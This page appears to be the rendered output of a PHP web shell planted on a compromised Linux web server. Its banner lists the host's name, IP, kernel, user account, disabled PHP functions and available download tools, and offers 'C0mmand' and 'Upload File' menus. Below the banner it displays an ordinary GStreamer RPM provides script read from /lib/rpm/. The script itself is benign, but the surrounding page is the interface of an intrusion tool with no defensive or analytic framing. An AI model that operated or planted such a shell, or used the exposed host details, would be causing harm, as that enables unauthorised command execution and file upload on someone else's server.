Server IP : 192.168.23.10 / Your IP : 18.227.46.87 Web Server : Apache System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64 User : rrrallyteam ( 1049) PHP Version : 8.1.31 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /lib/rpm/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
#!/usr/bin/sh # # Script to install in: # /usr/lib/rpm/redhat/find-provides.d # # Transform GStreamer auto install info into RPM provides # # Author: Bastien Nocera <hadess@hadess.net> # Based on other provides scripts from RPM # filelist=`grep -e '^.*/gstreamer-1.0/lib.*.so$' | sed "s/['\"]/\\\&/g"` # --- Alpha does not mark 64bit dependencies• case `uname -m` in alpha*) mark64="" ;; *) mark64="()(64bit)" ;; esac solist=$(echo $filelist | \ xargs file -L 2>/dev/null | grep "ELF" | cut -d: -f1 ) function getmark() { lib64=`if file -L $1 2>/dev/null | \ grep "ELF 64-bit" >/dev/null; then echo -n "$mark64"; fi` } function libdir() { buildlibdir=`dirname $1` buildlibdir=`dirname $buildlibdir` } for so in $solist ; do getmark $so libdir $so LD_LIBRARY_PATH=$buildlibdir gst-inspect-1.0 --print-plugin-auto-install-info --rpm $so 2> /dev/null | while read line ; do echo -n "$line"; echo -n "$lib64" echo done done